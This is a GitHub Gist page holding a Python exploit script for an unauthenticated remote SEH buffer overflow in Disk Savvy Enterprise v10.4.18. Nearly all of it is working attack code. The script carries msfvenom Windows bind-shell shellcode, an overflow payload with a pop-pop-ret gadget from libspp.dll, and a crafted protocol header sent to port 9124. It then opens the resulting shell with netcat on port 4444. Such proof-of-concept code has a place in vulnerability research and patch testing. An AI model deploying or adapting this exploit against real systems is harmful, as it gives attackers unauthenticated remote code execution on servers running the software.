-
-
Save DanielRTeixeira/5af55e62340e4df38e0c411eb0cc3dca to your computer and use it in GitHub Desktop.
Disk Savvy Enterprise v10.4.18 Unauthenticated Remote Buffer Overflow
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Exploit Title: Disk Savvy Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH | |
# Date: 29/01/2018 | |
# Exploit Author: Daniel Teixeira | |
# Vendor Homepage: http://www.disksavvy.com/ | |
# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe | |
# Version: 10.4.18 | |
# Tested on: Windows 7 x86 | |
from struct import pack | |
from os import system | |
from sys import exit | |
from time import sleep | |
import socket | |
port = 9124 | |
host = "127.0.0.1" | |
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -f py -b '\x00\x02\x0a\x0d\xf8\xfd' --var-name shellcode | |
shellcode = "" | |
shellcode += "\xba\x71\x6d\xbf\xc8\xd9\xc0\xd9\x74\x24\xf4\x5d" | |
shellcode += "\x29\xc9\xb1\x53\x83\xed\xfc\x31\x55\x0e\x03\x24" | |
shellcode += "\x63\x5d\x3d\x3a\x93\x23\xbe\xc2\x64\x44\x36\x27" | |
shellcode += "\x55\x44\x2c\x2c\xc6\x74\x26\x60\xeb\xff\x6a\x90" | |
shellcode += "\x78\x8d\xa2\x97\xc9\x38\x95\x96\xca\x11\xe5\xb9" | |
shellcode += "\x48\x68\x3a\x19\x70\xa3\x4f\x58\xb5\xde\xa2\x08" | |
shellcode += "\x6e\x94\x11\xbc\x1b\xe0\xa9\x37\x57\xe4\xa9\xa4" | |
shellcode += "\x20\x07\x9b\x7b\x3a\x5e\x3b\x7a\xef\xea\x72\x64" | |
shellcode += "\xec\xd7\xcd\x1f\xc6\xac\xcf\xc9\x16\x4c\x63\x34" | |
shellcode += "\x97\xbf\x7d\x71\x10\x20\x08\x8b\x62\xdd\x0b\x48" | |
shellcode += "\x18\x39\x99\x4a\xba\xca\x39\xb6\x3a\x1e\xdf\x3d" | |
shellcode += "\x30\xeb\xab\x19\x55\xea\x78\x12\x61\x67\x7f\xf4" | |
shellcode += "\xe3\x33\xa4\xd0\xa8\xe0\xc5\x41\x15\x46\xf9\x91" | |
shellcode += "\xf6\x37\x5f\xda\x1b\x23\xd2\x81\x73\x80\xdf\x39" | |
shellcode += "\x84\x8e\x68\x4a\xb6\x11\xc3\xc4\xfa\xda\xcd\x13" | |
shellcode += "\xfc\xf0\xaa\x8b\x03\xfb\xca\x82\xc7\xaf\x9a\xbc" | |
shellcode += "\xee\xcf\x70\x3c\x0e\x1a\xec\x34\xa9\xf5\x13\xb9" | |
shellcode += "\x09\xa6\x93\x11\xe2\xac\x1b\x4e\x12\xcf\xf1\xe7" | |
shellcode += "\xbb\x32\xfa\x16\x60\xba\x1c\x72\x88\xea\xb7\xea" | |
shellcode += "\x6a\xc9\x0f\x8d\x95\x3b\x38\x39\xdd\x2d\xff\x46" | |
shellcode += "\xde\x7b\x57\xd0\x55\x68\x63\xc1\x69\xa5\xc3\x96" | |
shellcode += "\xfe\x33\x82\xd5\x9f\x44\x8f\x8d\x3c\xd6\x54\x4d" | |
shellcode += "\x4a\xcb\xc2\x1a\x1b\x3d\x1b\xce\xb1\x64\xb5\xec" | |
shellcode += "\x4b\xf0\xfe\xb4\x97\xc1\x01\x35\x55\x7d\x26\x25" | |
shellcode += "\xa3\x7e\x62\x11\x7b\x29\x3c\xcf\x3d\x83\x8e\xb9" | |
shellcode += "\x97\x78\x59\x2d\x61\xb3\x5a\x2b\x6e\x9e\x2c\xd3" | |
shellcode += "\xdf\x77\x69\xec\xd0\x1f\x7d\x95\x0c\x80\x82\x4c" | |
shellcode += "\x95\xb0\xc8\xcc\xbc\x58\x95\x85\xfc\x04\x26\x70" | |
shellcode += "\xc2\x30\xa5\x70\xbb\xc6\xb5\xf1\xbe\x83\x71\xea" | |
shellcode += "\xb2\x9c\x17\x0c\x60\x9c\x3d" | |
payload = "A" * 124 # offset | |
payload += "\x90\x09\xeb\x05" # jmp over seh retrun value | |
payload += "\x13\x6d\x05\x10" # 0x10056d13 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Disk Savvy Enterprise\bin\libspp.dll) | |
payload += "\x90" * 10 | |
payload += "\x83\xc4\x64" * 20 # metasm > add esp,100 | |
payload += "\xff\xe4" # metasm > jmp esp | |
payload += "\x90" * (1000 - len(payload) - len(shellcode)) | |
payload += shellcode | |
header = "\x75\x19\xba\xab" | |
header += "\x03\x00\x00\x00" | |
header += "\x00\x40\x00\x00" | |
header += pack('<I', len(payload)) | |
header += pack('<I', len(payload)) | |
header += pack('<I', ord(payload[-1])) | |
packet = header | |
packet += payload | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
try: | |
print "[*] Testing connection to tatget %s:%s" %(host,port) | |
s.connect((host, port)) | |
except: | |
print "[-] Unable to communicate to target %s:%s" %(host,port) | |
exit() | |
s.send(packet) | |
print "[*] Payload Sent.." | |
print "[*] Connecting to bind shell %s:4444 .." %host | |
sleep(5) | |
system("nc %s 4444"%host) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment